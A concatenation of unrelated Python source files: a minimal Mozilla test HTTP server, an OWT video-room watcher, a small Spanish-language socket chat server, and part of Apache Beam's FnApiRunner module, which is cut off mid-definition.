#!/usr/bin/env python # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. import BaseHTTPServer import SimpleHTTPServer import errno import logging import threading import posixpath import socket import sys import os import urllib import urlparse import re import time from SocketServer import ThreadingMixIn class EasyServer(ThreadingMixIn, BaseHTTPServer.HTTPServer): allow_reuse_address = True acceptable_errors = (errno.EPIPE, errno.ECONNABORTED) def handle_error(self, request, client_address): error = sys.exc_value if ((isinstance(error, socket.error) and isinstance(error.args, tuple) and error.args[0] in self.acceptable_errors) or (isinstance(error, IOError) and error.errno in self.acceptable_errors)): pass # remote hang up before the result is sent else: logging.error(error) class Request(object): """Details of a request.""" # attributes from urlsplit that this class also sets uri_attrs = ('scheme', 'netloc', 'path', 'query', 'fragment') def __init__(self, uri, headers, rfile=None): self.uri = uri self.headers = headers parsed = urlparse.urlsplit(uri) for i, attr in enumerate(self.uri_attrs): setattr(self, attr, parsed[i]) try: body_len = int(self.headers.get('Content-length', 0)) except ValueError: body_len = 0 if body_len and rfile: self.body = rfile.read(body_len) else: self.body = None class RequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): docroot = os.getcwd() # current working directory at time of import proxy_host_dirs = False request_log = [] log_requests = False request = None def _try_handler(self, method): if self.log_requests: self.request_log.append({ 'method': method, 'path': self.request.path, 'time': time.time() }) handlers = [handler for handler in self.urlhandlers if handler['method'] == method] for handler in handlers: m = re.match(handler['path'], self.request.path) if m: (response_code, headerdict, data) = \ handler['function'](self.request, *m.groups()) self.send_response(response_code) for (keyword, value) in headerdict.iteritems(): self.send_header(keyword, value) self.end_headers() self.wfile.write(data) return True return False def parse_request(self): retval = SimpleHTTPServer.SimpleHTTPRequestHandler.parse_request(self) self.request = Request(self.path, self.headers, self.rfile) return retval def do_GET(self): if not self._try_handler('GET'): if self.path == '/navigation/redirect': self.send_response(301) self.send_header('Location', '/navigation/res/empty.html') self.end_headers() elif self.docroot: # don't include query string and fragment, and prepend # host directory if required. if self.request.netloc and self.proxy_host_dirs: self.path = '/' + self.request.netloc + \ self.request.path else: self.path = self.request.path SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self) else: self.send_response(404) self.end_headers() self.wfile.write('') def do_POST(self): # if we don't have a match, we always fall through to 404 (this may # not be "technically" correct if we have a local file at the same # path as the resource but... meh) if not self._try_handler('POST'): self.send_response(404) self.end_headers() self.wfile.write('') def do_DEL(self): # if we don't have a match, we always fall through to 404 (this may # not be "technically" correct if we have a local file at the same # path as the resource but... meh) if not self._try_handler('DEL'): self.send_response(404) self.end_headers() self.wfile.write('') def translate_path(self, path): # this is taken from SimpleHTTPRequestHandler.translate_path(), # except we serve from self.docroot instead of os.getcwd(), and # parse_request()/do_GET() have already stripped the query string and # fragment and mangled the path for proxying, if required. path = posixpath.normpath(urllib.unquote(self.path)) words = path.split('/') words = filter(None, words) path = self.docroot for word in words: drive, word = os.path.splitdrive(word) head, word = os.path.split(word) if word in (os.curdir, os.pardir): continue path = os.path.join(path, word) return path # I found on my local network that calls to this were timing out # I believe all of these calls are from log_message def address_string(self): return "a.b.c.d" # This produces a LOT of noise def log_message(self, format, *args): pass class Httpd(object): """ Very basic HTTP server class. Takes a docroot (path on the filesystem) and a set of urlhandler dictionaries of the form: { 'method': HTTP method (string): GET, POST, or DEL, 'path': PATH_INFO (regular expression string), 'function': function of form fn(arg1, arg2, arg3, ..., request) } and serves HTTP. For each request, MozHttpd will either return a file off the docroot, or dispatch to a handler function (if both path and method match). Note that one of docroot or urlhandlers may be None (in which case no local files or handlers, respectively, will be used). If both docroot or urlhandlers are None then MozHttpd will default to serving just the local directory. MozHttpd also handles proxy requests (i.e. with a full URI on the request line). By default files are served from docroot according to the request URI's path component, but if proxy_host_dirs is True, files are served from <self.docroot>/<host>/. For example, the request "GET http://foo.bar/dir/file.html" would (assuming no handlers match) serve <docroot>/dir/file.html if proxy_host_dirs is False, or <docroot>/foo.bar/dir/file.html if it is True. """ def __init__(self, host="127.0.0.1", port=8888, docroot=None, urlhandlers=None, proxy_host_dirs=False, log_requests=False): self.host = host self.port = int(port) self.docroot = docroot if not urlhandlers and not docroot: self.docroot = os.getcwd() self.proxy_host_dirs = proxy_host_dirs self.httpd = None self.urlhandlers = urlhandlers or [] self.log_requests = log_requests self.request_log = [] class RequestHandlerInstance(RequestHandler): docroot = self.docroot urlhandlers = self.urlhandlers proxy_host_dirs = self.proxy_host_dirs request_log = self.request_log log_requests = self.log_requests self.handler_class = RequestHandlerInstance def start(self, block=False): """ Start the server. If block is True, the call will not return. If block is False, the server will be started on a separate thread that can be terminated by a call to .stop() """ self.httpd = EasyServer((self.host, self.port), self.handler_class) if block: self.httpd.serve_forever() else: self.server = threading.Thread(target=self.httpd.serve_forever) self.server.setDaemon(True) # don't hang on exit self.server.start() def stop(self): if self.httpd: ### FIXME: There is no shutdown() method in Python 2.4... try: self.httpd.shutdown() except AttributeError: pass self.httpd = None __del__ = stop def where_is(self, path): mobile = self.__dict__['mobile'] if mobile == "android": return "file:///%s/%s" % ("android_asset/www", path) elif mobile == "tizen": return "app://%s/%s" % (self.__dict__['appId'], path) else: return "http://%s:%d/%s" % (self.host, self.port, path) def main(args=sys.argv[1:]): # parse command line options from optparse import OptionParser parser = OptionParser() parser.add_option('-p', '--port', dest='port', type="int", default=8888, help="port to run the server on [DEFAULT: %default]") parser.add_option('-H', '--host', dest='host', default='127.0.0.1', help="host [DEFAULT: %default]") parser.add_option('-i', '--external-ip', action="store_true", dest='external_ip', default=False, help="find and use external ip for host") parser.add_option('-d', '--docroot', dest='docroot', default=os.getcwd(), help="directory to serve files from [DEFAULT: %default]") options, args = parser.parse_args(args) if args: parser.error("mozhttpd does not take any arguments") host = options.host # create the server server = Httpd(host=host, port=options.port, docroot=options.docroot) print "Serving '%s' at %s:%s" % (server.docroot, server.host, server.port) server.start(block=True) if __name__ == '__main__': main()
watcher.py
#!/usr/bin/python3 from threading import Thread, Event from owtapi import OWTAPI from db_query import DBQuery from configuration import env import time office = list(map(float,env["OFFICE"].split(","))) if "OFFICE" in env else None dbhost= env.get("DBHOST",None) inactive_time=float(env["INACTIVE_TIME"]) class RoomWatcher(object): def __init__(self, inactive=inactive_time, stop=Event()): super(RoomWatcher, self).__init__() self._stop=stop self._inactive=inactive self._rooms={} Thread(target=self._cleanup_thread).start() def get(self, name): if name not in self._rooms: return (None,None) return (self._rooms[name]["room"], self._rooms[name]["stream_in"]) def _parse_name(self, name): items=name.split(":") return {"id": items[3], "type": items[1], "subtype": items[2]} def set(self, name, room, stream=None): if name in self._rooms: return self._rooms[name]={ "room": room, "stream_in": stream, "stream_out": { "stream": None, "status": "idle", "rtmpurl": None, }, "sensor": self._parse_name(name), "time": int(time.time()), } def set_stream_out(self, name, status, rtmpurl): if name not in self._rooms: return self._rooms[name]["stream_out"]= {"status": status, "rtmpurl": rtmpurl} def _cleanup_thread(self): owt=OWTAPI() dbs=DBQuery(index="sensors",office=office,host=dbhost) while not self._stop.is_set(): todelete=[] tostartstreamout=[] tostopstreamout=[] for name in self._rooms: try: participants=owt.list_participants(self._rooms[name]["room"]) except: participants=0 now=int(time.time()) print("Watcher: room {} participant {} inactive {} stream-out status {}".format(name,participants,now-self._rooms[name]["time"],self._rooms[name]["stream_out"]["status"]), flush=True) print(self._rooms[name], flush=True) if participants>0: self._rooms[name]["time"]=now elif now-self._rooms[name]["time"]>self._inactive: todelete.append(name) if self._rooms[name]["stream_out"]["status"] == "start": tostartstreamout.append(name) elif self._rooms[name]["stream_out"]["status"] == "stop": tostopstreamout.append(name) for name in tostartstreamout: if self._rooms[name]["sensor"]["subtype"] != "mobile_camera": continue sensor=self._rooms[name]["sensor"] stream1=self._rooms[name]["stream_in"] room1=self._rooms[name]["room"] rtmpurl=self._rooms[name]["stream_out"]["rtmpurl"] try: stream1=stream1 if stream1 else owt.list_streams(room1)[0] except: continue self._rooms[name]["stream_in"]=stream1 if stream1 and rtmpurl: try: self._rooms[name]["stream_out"]["stream"] = owt.start_streaming_outs(room=room1,url=rtmpurl,video_from=stream1)["id"] except: continue else: continue try: dbs.update(sensor["id"],{"status":"disconnected", "url":rtmpurl}) except: continue self._rooms[name]["stream_out"]["status"] = "streaming" for name in tostopstreamout: if self._rooms[name]["sensor"]["subtype"] != "mobile_camera": continue stream1=self._rooms[name]["stream_out"]["stream"] room1=self._rooms[name]["room"] if stream1: try: owt.stop_streaming_outs(room1,stream1) except: continue self._rooms[name]["stream_out"]["status"] = "idle" for name in todelete: stream1=self._rooms[name]["stream_in"] room1=self._rooms[name]["room"] try: streams=[stream1] if stream1 else owt.list_streams(room1) except: streams=[] # for stream1 in streams: # print("Remove stream {}".format(stream1), flush=True) # try: # owt.delete_stream(room1,stream1) # except: # pass print("Remove room {}:{}".format(name,room1), flush=True) try: owt.delete_room(room1) except: pass self._rooms.pop(name,None) self._stop.wait(self._inactive/3.0)
servidor_chat.py
from socket import * from threading import * import mysql.connector clientes = {} direcciones = {} def configuracion(): global servidor servidor = socket() servidor.bind(("", 9998)) servidor.listen(10) print("Esperando conexiones...") aceptar_hilo = Thread(target=aceptar_conexiones) aceptar_hilo.start() aceptar_hilo.join() def aceptar_conexiones(): while True: cliente_local, direccion_cliente = servidor.accept() print("%s:%s conectado. "% direccion_cliente) cliente_local.send(bytes("Bienvenido...", "utf-8")) direcciones[cliente_local] = direccion_cliente Thread(target=encargarse_cliente,args=(cliente_local,)).start() def encargarse_cliente(cliente): nombre = cliente.recv(1024).decode("utf-8") clientes[cliente] = nombre while True: print("chat conectado") # if opcion =="chat_grupal": # cliente.send(bytes("bienvenido", "utf-8")) print("2") # while True: mensaje = cliente.recv(1024).decode("utf-8") print("3") # guardar_mensaje(nombre, mensaje) # broadcast(mensaje) if mensaje != "{salir}": # guardar_mensaje(nombre, mensaje) broadcast(mensaje, nombre) else: del clientes[cliente] broadcast(bytes("%s ha salido del chat." % nombre, "utf-8")) break def broadcast(mensaje, prefix=""): print("enviando a todos") for sock in clientes: sock.send(bytes(prefix +": " + mensaje, "utf-8")) # def guardar_mensaje(nombre,mensaje): # conexion = mysql.connector.connect(user="root", password="", host="localhost", database="chat") # cursor = conexion.cursor() # sql = "INSERT INTO comunicaciones(usuario, mensaje)VALUES(%s,%s)" # parametros = (str(nombre), str(mensaje)) # cursor.execute(sql,parametros) # conexion.commit() # conexion.close # def broadcast(mensaje, prefix=""): # for sock in clientes: # sock.send(bytes(prefix + mensaje, "utf-8")) if __name__ == "__main__": configuracion()
fn_runner.py
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """A PipelineRunner using the SDK harness. """ # pytype: skip-file from __future__ import absolute_import from __future__ import print_function import collections import contextlib import copy import itertools import logging import os import queue import subprocess import sys import threading import time from builtins import object from typing import TYPE_CHECKING from typing import Any from typing import Callable from typing import DefaultDict from typing import Dict from typing import Iterable from typing import Iterator from typing import List from typing import Mapping from typing import MutableMapping from typing import Optional from typing import Sequence from typing import Tuple from typing import Type from typing import TypeVar from typing import Union from typing import cast from typing import overload import grpc from typing_extensions import Protocol import apache_beam as beam # pylint: disable=ungrouped-imports from apache_beam import coders from apache_beam.coders.coder_impl import create_InputStream from apache_beam.coders.coder_impl import create_OutputStream from apache_beam.metrics import metric from apache_beam.metrics import monitoring_infos from apache_beam.metrics.execution import MetricResult from apache_beam.options import pipeline_options from apache_beam.options.value_provider import RuntimeValueProvider from apache_beam.portability import common_urns from apache_beam.portability import python_urns from apache_beam.portability.api import beam_artifact_api_pb2 from apache_beam.portability.api import beam_artifact_api_pb2_grpc from apache_beam.portability.api import beam_fn_api_pb2 from apache_beam.portability.api import beam_fn_api_pb2_grpc from apache_beam.portability.api import beam_provision_api_pb2 from apache_beam.portability.api import beam_provision_api_pb2_grpc from apache_beam.portability.api import beam_runner_api_pb2 from apache_beam.portability.api import endpoints_pb2 from apache_beam.runners import pipeline_context from apache_beam.runners import runner from apache_beam.runners.portability import artifact_service from apache_beam.runners.portability import portable_metrics from apache_beam.runners.portability.fn_api_runner import translations from apache_beam.runners.portability.fn_api_runner.translations import create_buffer_id from apache_beam.runners.portability.fn_api_runner.translations import only_element from apache_beam.runners.portability.fn_api_runner.translations import split_buffer_id from apache_beam.runners.portability.fn_api_runner.translations import unique_name from apache_beam.runners.worker import bundle_processor from apache_beam.runners.worker import data_plane from apache_beam.runners.worker import sdk_worker from apache_beam.runners.worker.channel_factory import GRPCChannelFactory from apache_beam.runners.worker.sdk_worker import _Future from apache_beam.runners.worker.statecache import StateCache from apache_beam.transforms import environments from apache_beam.transforms import trigger from apache_beam.transforms.window import GlobalWindow from apache_beam.transforms.window import GlobalWindows from apache_beam.utils import profiler from apache_beam.utils import proto_utils from apache_beam.utils import windowed_value from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor if TYPE_CHECKING: from apache_beam.pipeline import Pipeline from apache_beam.coders.coder_impl import CoderImpl from apache_beam.coders.coder_impl import WindowedValueCoderImpl from apache_beam.portability.api import metrics_pb2 from apache_beam.transforms.window import BoundedWindow T = TypeVar('T') ConstructorFn = Callable[[ Union['message.Message', bytes], 'FnApiRunner.StateServicer', Optional['ExtendedProvisionInfo'], 'GrpcServer' ], 'WorkerHandler'] DataSideInput = Dict[Tuple[str, str], Tuple[bytes, beam_runner_api_pb2.FunctionSpec]] DataOutput = Dict[str, bytes] BundleProcessResult = Tuple[beam_fn_api_pb2.InstructionResponse, List[beam_fn_api_pb2.ProcessBundleSplitResponse]] # This module is experimental. No backwards-compatibility guarantees. ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder( beam.coders.BytesCoder(), beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested( beam.transforms.window.GlobalWindows.windowed_value(b'')) # State caching is enabled in the fn_api_runner for testing, except for one # test which runs without state caching (FnApiRunnerTestWithDisabledCaching). # The cache is disabled in production for other runners. STATE_CACHE_SIZE = 100 # Time-based flush is enabled in the fn_api_runner by default. DATA_BUFFER_TIME_LIMIT_MS = 1000 _LOGGER = logging.getLogger(__name__) class ControlConnection(object): _uid_counter = 0 _lock = threading.Lock() def __init__(self): self._push_queue = queue.Queue( ) # type: queue.Queue[beam_fn_api_pb2.InstructionRequest] self._input = None # type: Optional[Iterable[beam_fn_api_pb2.InstructionResponse]] self._futures_by_id = dict() # type: Dict[str, ControlFuture] self._read_thread = threading.Thread( name='beam_control_read', target=self._read) self._state = BeamFnControlServicer.UNSTARTED_STATE def _read(self): for data in self._input: self._futures_by_id.pop(data.instruction_id).set(data) @overload def push(self, req): # type: (BeamFnControlServicer.DoneMarker) -> None pass @overload def push(self, req): # type: (beam_fn_api_pb2.InstructionRequest) -> ControlFuture pass def push(self, req): if req == BeamFnControlServicer._DONE_MARKER: self._push_queue.put(req) return None if not req.instruction_id: with ControlConnection._lock: ControlConnection._uid_counter += 1 req.instruction_id = 'control_%s' % ControlConnection._uid_counter future = ControlFuture(req.instruction_id) self._futures_by_id[req.instruction_id] = future self._push_queue.put(req) return future def get_req(self): # type: () -> beam_fn_api_pb2.InstructionRequest return self._push_queue.get() def set_input(self, input): # type: (Iterable[beam_fn_api_pb2.InstructionResponse]) -> None with ControlConnection._lock: if self._input: raise RuntimeError('input is already set.') self._input = input self._read_thread.start() self._state = BeamFnControlServicer.STARTED_STATE def close(self): # type: () -> None with ControlConnection._lock: if self._state == BeamFnControlServicer.STARTED_STATE: self.push(BeamFnControlServicer._DONE_MARKER) self._read_thread.join() self._state = BeamFnControlServicer.DONE_STATE class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer): """Implementation of BeamFnControlServicer for clients.""" UNSTARTED_STATE = 'unstarted' STARTED_STATE = 'started' DONE_STATE = 'done' class DoneMarker(object): pass _DONE_MARKER = DoneMarker() def __init__(self): self._lock = threading.Lock() self._uid_counter = 0 self._state = self.UNSTARTED_STATE # following self._req_* variables are used for debugging purpose, data is # added only when self._log_req is True. self._req_sent = collections.defaultdict(int) self._req_worker_mapping = {} self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG self._connections_by_worker_id = collections.defaultdict( ControlConnection) # type: DefaultDict[str, ControlConnection] def get_conn_by_worker_id(self, worker_id): # type: (str) -> ControlConnection with self._lock: return self._connections_by_worker_id[worker_id] def Control(self, iterator, # type: Iterable[beam_fn_api_pb2.InstructionResponse] context ): # type: (...) -> Iterator[beam_fn_api_pb2.InstructionRequest] with self._lock: if self._state == self.DONE_STATE: return else: self._state = self.STARTED_STATE worker_id = dict(context.invocation_metadata()).get('worker_id') if not worker_id: raise RuntimeError( 'All workers communicate through gRPC should have ' 'worker_id. Received None.') control_conn = self.get_conn_by_worker_id(worker_id) control_conn.set_input(iterator) while True: to_push = control_conn.get_req() if to_push is self._DONE_MARKER: return yield to_push if self._log_req: self._req_sent[to_push.instruction_id] += 1 def done(self): self._state = self.DONE_STATE _LOGGER.debug( 'Runner: Requests sent by runner: %s', [(str(req), cnt) for req, cnt in self._req_sent.items()]) _LOGGER.debug( 'Runner: Requests multiplexing info: %s', [(str(req), worker) for req, worker in self._req_worker_mapping.items()]) class Buffer(Protocol): def __iter__(self): # type: () -> Iterator[bytes] pass def append(self, item): # type: (bytes) -> None pass class PartitionableBuffer(Buffer, Protocol): def partition(self, n): # type: (int) -> List[List[bytes]] pass class _ListBuffer(): """Used to support parititioning of a list.""" def __init__(self, coder_impl): self._coder_impl = coder_impl self._inputs = [] # type: List[bytes] self._grouped_output = None self.cleared = False def append(self, element): # type: (bytes) -> None if self.cleared: raise RuntimeError('Trying to append to a cleared ListBuffer.') if self._grouped_output: raise RuntimeError('ListBuffer append after read.') self._inputs.append(element) def partition(self, n): # type: (int) -> List[List[bytes]] if self.cleared: raise RuntimeError('Trying to partition a cleared ListBuffer.') if len(self._inputs) >= n or len(self._inputs) == 0: return [self._inputs[k::n] for k in range(n)] else: if not self._grouped_output: output_stream_list = [create_OutputStream() for _ in range(n)] idx = 0 for input in self._inputs: input_stream = create_InputStream(input) while input_stream.size() > 0: decoded_value = self._coder_impl.decode_from_stream( input_stream, True) self._coder_impl.encode_to_stream( decoded_value, output_stream_list[idx], True) idx = (idx + 1) % n self._grouped_output = [[output_stream.get()] for output_stream in output_stream_list] return self._grouped_output def __iter__(self): # type: () -> Iterator[bytes] if self.cleared: raise RuntimeError('Trying to iterate through a cleared ListBuffer.') return iter(self._inputs) def clear(self): # type: () -> None self.cleared = True self._inputs = [] self._grouped_output = None class _GroupingBuffer(object): """Used to accumulate groupded (shuffled) results.""" def __init__(self, pre_grouped_coder, # type: coders.Coder post_grouped_coder, # type: coders.Coder windowing ): # type: (...) -> None self._key_coder = pre_grouped_coder.key_coder() self._pre_grouped_coder = pre_grouped_coder self._post_grouped_coder = post_grouped_coder self._table = collections.defaultdict( list) # type: DefaultDict[bytes, List[Any]] self._windowing = windowing self._grouped_output = None # type: Optional[List[List[bytes]]] def append(self, elements_data): # type: (bytes) -> None if self._grouped_output: raise RuntimeError('Grouping table append after read.') input_stream = create_InputStream(elements_data) coder_impl = self._pre_grouped_coder.get_impl() key_coder_impl = self._key_coder.get_impl() # TODO(robertwb): We could optimize this even more by using a # window-dropping coder for the data plane. is_trivial_windowing = self._windowing.is_default() while input_stream.size() > 0: windowed_key_value = coder_impl.decode_from_stream(input_stream, True) key, value = windowed_key_value.value self._table[key_coder_impl.encode(key)].append( value if is_trivial_windowing else windowed_key_value. with_value(value)) def partition(self, n): # type: (int) -> List[List[bytes]] """ It is used to partition _GroupingBuffer to N parts. Once it is partitioned, it would not be re-partitioned with diff N. Re-partition is not supported now. """ if not self._grouped_output: if self._windowing.is_default(): globally_window = GlobalWindows.windowed_value( None, timestamp=GlobalWindow().max_timestamp(), pane_info=windowed_value.PaneInfo( is_first=True, is_last=True, timing=windowed_value.PaneInfoTiming.ON_TIME, index=0, nonspeculative_index=0)).with_value windowed_key_values = lambda key, values: [ globally_window((key, values))] else: # TODO(pabloem, BEAM-7514): Trigger driver needs access to the clock # note that this only comes through if windowing is default - but what # about having multiple firings on the global window. # May need to revise. trigger_driver = trigger.create_trigger_driver(self._windowing, True) windowed_key_values = trigger_driver.process_entire_key coder_impl = self._post_grouped_coder.get_impl() key_coder_impl = self._key_coder.get_impl() self._grouped_output = [[] for _ in range(n)] output_stream_list = [create_OutputStream() for _ in range(n)] for idx, (encoded_key, windowed_values) in enumerate(self._table.items()): key = key_coder_impl.decode(encoded_key) for wkvs in windowed_key_values(key, windowed_values): coder_impl.encode_to_stream(wkvs, output_stream_list[idx % n], True) for ix, output_stream in enumerate(output_stream_list): self._grouped_output[ix] = [output_stream.get()] self._table.clear() return self._grouped_output def __iter__(self): # type: () -> Iterator[bytes] """ Since partition() returns a list of lists, add this __iter__ to return a list to simplify code when we need to iterate through ALL elements of _GroupingBuffer. """ return itertools.chain(*self.partition(1)) class _WindowGroupingBuffer(object): """Used to partition windowed side inputs.""" def __init__( self, access_pattern, coder # type: coders.WindowedValueCoder ): # type: (...) -> None # Here's where we would use a different type of partitioning # (e.g. also by key) for a different access pattern. if access_pattern.urn == common_urns.side_inputs.ITERABLE.urn: self._kv_extractor = lambda value: ('', value) self._key_coder = coders.SingletonCoder('') # type: coders.Coder self._value_coder = coder.wrapped_value_coder elif access_pattern.urn == common_urns.side_inputs.MULTIMAP.urn: self._kv_extractor = lambda value: value self._key_coder = coder.wrapped_value_coder.key_coder() self._value_coder = (coder.wrapped_value_coder.value_coder()) else: raise ValueError("Unknown access pattern: '%s'" % access_pattern.urn) self._windowed_value_coder = coder self._window_coder = coder.window_coder self._values_by_window = collections.defaultdict( list) # type: DefaultDict[Tuple[str, BoundedWindow], List[Any]] def append(self, elements_data): # type: (bytes) -> None input_stream = create_InputStream(elements_data) while input_stream.size() > 0: windowed_val_coder_impl = self._windowed_value_coder.get_impl( ) # type: WindowedValueCoderImpl windowed_value = windowed_val_coder_impl.decode_from_stream( input_stream, True) key, value = self._kv_extractor(windowed_value.value) for window in windowed_value.windows: self._values_by_window[key, window].append(value) def encoded_items(self): # type: () -> Iterator[Tuple[bytes, bytes, bytes]] value_coder_impl = self._value_coder.get_impl() key_coder_impl = self._key_coder.get_impl() for (key, window), values in self._values_by_window.items(): encoded_window = self._window_coder.encode(window) encoded_key = key_coder_impl.encode_nested(key) output_stream = create_OutputStream() for value in values: value_coder_impl.encode_to_stream(value, output_stream, True) yield encoded_key, encoded_window, output_stream.get() class FnApiRunner(runner.PipelineRunner): def __init__( self, default_environment=None, # type: Optional[environments.Environment] bundle_repeat=0, use_state_iterables=False, provision_info=None, # type: Optional[ExtendedProvisionInfo] progress_request_frequency=None): # type: (...) -> None """Creates a new Fn API Runner. Args: default_environment: the default environment to use for UserFns. bundle_repeat: replay every bundle this many extra times, for profiling and debugging use_state_iterables: Intentionally split gbk iterables over state API (for testing) provision_info: provisioning info to make available to workers, or None progress_request_frequency: The frequency (in seconds) that the runner waits before requesting progress from the SDK. """ super(FnApiRunner, self).__init__() self._last_uid = -1 self._default_environment = ( default_environment or environments.EmbeddedPythonEnvironment()) self._bundle_repeat = bundle_repeat self._num_workers = 1 self._progress_frequency = progress_request_frequency self._profiler_factory = None # type: Optional[Callable[..., profiler.Profile]] self._use_state_iterables = use_state_iterables self._provision_info = provision_info or ExtendedProvisionInfo( beam_provision_api_pb2.ProvisionInfo( retrieval_token='unused-retrieval-token')) def _next_uid(self): self._last_uid += 1 return str(self._last_uid) @staticmethod def supported_requirements(): return ( common_urns.requirements.REQUIRES_STATEFUL_PROCESSING.urn, common_urns.requirements.REQUIRES_BUNDLE_FINALIZATION.urn, common_urns.requirements.REQUIRES_SPLITTABLE_DOFN.urn, ) def run_pipeline(self, pipeline, # type: Pipeline options # type: pipeline_options.PipelineOptions ): # type: (...) -> RunnerResult RuntimeValueProvider.set_runtime_options({}) # Setup "beam_fn_api" experiment options if lacked. experiments = ( options.view_as(pipeline_options.DebugOptions).experiments or []) if not 'beam_fn_api' in experiments: experiments.append('beam_fn_api') options.view_as(pipeline_options.DebugOptions).experiments = experiments # This is sometimes needed if type checking is disabled # to enforce that the inputs (and outputs) of GroupByKey operations # are known to be KVs. from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner # TODO: Move group_by_key_input_visitor() to a non-dataflow specific file. pipeline.visit(DataflowRunner.group_by_key_input_visitor()) self._bundle_repeat = self._bundle_repeat or options.view_as( pipeline_options.DirectOptions).direct_runner_bundle_repeat self._num_workers = options.view_as( pipeline_options.DirectOptions).direct_num_workers or self._num_workers # set direct workers running mode if it is defined with pipeline options. running_mode = \ options.view_as(pipeline_options.DirectOptions).direct_running_mode if running_mode == 'multi_threading': self._default_environment = environments.EmbeddedPythonGrpcEnvironment() elif running_mode == 'multi_processing': command_string = '%s -m apache_beam.runners.worker.sdk_worker_main' \ % sys.executable self._default_environment = environments.SubprocessSDKEnvironment( command_string=command_string) self._profiler_factory = profiler.Profile.factory_from_options( options.view_as(pipeline_options.ProfilingOptions)) self._latest_run_result = self.run_via_runner_api( pipeline.to_runner_api(default_environment=self._default_environment)) return self._latest_run_result def run_via_runner_api(self, pipeline_proto): # type: (beam_runner_api_pb2.Pipeline) -> RunnerResult self._validate_requirements(pipeline_proto) self._check_requirements(pipeline_proto) stage_context, stages = self.create_stages(pipeline_proto) # TODO(pabloem, BEAM-7514): Create a watermark manager (that has access to # the teststream (if any), and all the stages). return self.run_stages(stage_context, stages) @contextlib.contextmanager def maybe_profile(self): if self._profiler_factory: try: profile_id = 'direct-' + subprocess.check_output([ 'git', 'rev-parse', '--abbrev-ref', 'HEAD' ]).decode(errors='ignore').strip() except subprocess.CalledProcessError: profile_id = 'direct-unknown' profiler = self._profiler_factory(profile_id, time_prefix='') else: profiler = None if profiler: with profiler: yield if not self._bundle_repeat: _LOGGER.warning( 'The --direct_runner_bundle_repeat option is not set; ' 'a significant portion of the profile may be one-time overhead.') path = profiler.profile_output print('CPU Profile written to %s' % path) try: import gprof2dot # pylint: disable=unused-import if not subprocess.call([sys.executable, '-m', 'gprof2dot', '-f', 'pstats', path, '-o', path + '.dot']): if not subprocess.call( ['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']): print( 'CPU Profile rendering at file://%s.svg' % os.path.abspath(path)) except ImportError: # pylint: disable=superfluous-parens print('Please install gprof2dot and dot for profile renderings.') else: # Empty context. yield def _validate_requirements(self, pipeline_proto): """As a test runner, validate requirements were set correctly.""" expected_requirements = set() def add_requirements(transform_id): transform = pipeline_proto.components.transforms[transform_id] if transform.spec.urn in translations.PAR_DO_URNS: payload = proto_utils.parse_Bytes( transform.spec.payload, beam_runner_api_pb2.ParDoPayload) if payload.requests_finalization: expected_requirements.add( common_urns.requirements.REQUIRES_BUNDLE_FINALIZATION.urn) if (payload.state_specs or payload.timer_specs or payload.timer_family_specs): expected_requirements.add( common_urns.requirements.REQUIRES_STATEFUL_PROCESSING.urn) if payload.requires_stable_input: expected_requirements.add( common_urns.requirements.REQUIRES_STABLE_INPUT.urn) if payload.requires_time_sorted_input: expected_requirements.add( common_urns.requirements.REQUIRES_TIME_SORTED_INPUT.urn) if payload.restriction_coder_id: expected_requirements.add( common_urns.requirements.REQUIRES_SPLITTABLE_DOFN.urn) else: for sub in transform.subtransforms: add_requirements(sub) for root in pipeline_proto.root_transform_ids: add_requirements(root) if not expected_requirements.issubset(pipeline_proto.requirements): raise ValueError( 'Missing requirement declaration: %s' % (expected_requirements - set(pipeline_proto.requirements))) def _check_requirements(self, pipeline_proto): """Check that this runner can satisfy all pipeline requirements.""" supported_requirements = set(self.supported_requirements()) for requirement in pipeline_proto.requirements: if requirement not in supported_requirements: raise ValueError( 'Unable to run pipeline with requirement: %s' % requirement) def create_stages( self, pipeline_proto # type: beam_runner_api_pb2.Pipeline ): # type: (...) -> Tuple[translations.TransformContext, List[translations.Stage]] return translations.create_and_optimize_stages( copy.deepcopy(pipeline_proto), phases=[ translations.annotate_downstream_side_inputs, translations.fix_side_input_pcoll_coders, translations.lift_combiners, translations.expand_sdf, translations.expand_gbk, translations.sink_flattens, translations.greedily_fuse, translations.read_to_impulse, translations.impulse_to_input, translations.inject_timer_pcollections, translations.sort_stages, translations.window_pcollection_coders ], known_runner_urns=frozenset([ common_urns.primitives.FLATTEN.urn, common_urns.primitives.GROUP_BY_KEY.urn ]), use_state_iterables=self._use_state_iterables) def run_stages(self, stage_context, # type: translations.TransformContext stages # type: List[translations.Stage] ): # type: (...) -> RunnerResult """Run a list of topologically-sorted stages in batch mode. Args: stage_context (translations.TransformContext) stages (list[fn_api_runner.translations.Stage]) """ worker_handler_manager = WorkerHandlerManager( stage_context.components.environments, self._provision_info) metrics_by_stage = {} monitoring_infos_by_stage = {} try: with self.maybe_profile(): pcoll_buffers = {} # type: Dict[bytes, PartitionableBuffer] for stage in stages: stage_results = self._run_stage( worker_handler_manager.get_worker_handlers, stage_context.components, stage, pcoll_buffers, stage_context.safe_coders) metrics_by_stage[stage.name] = stage_results.process_bundle.metrics monitoring_infos_by_stage[stage.name] = ( stage_results.process_bundle.monitoring_infos) finally: worker_handler_manager.close_all() return RunnerResult( runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage) def _store_side_inputs_in_state(self, worker_handler, # type: WorkerHandler context, # type: 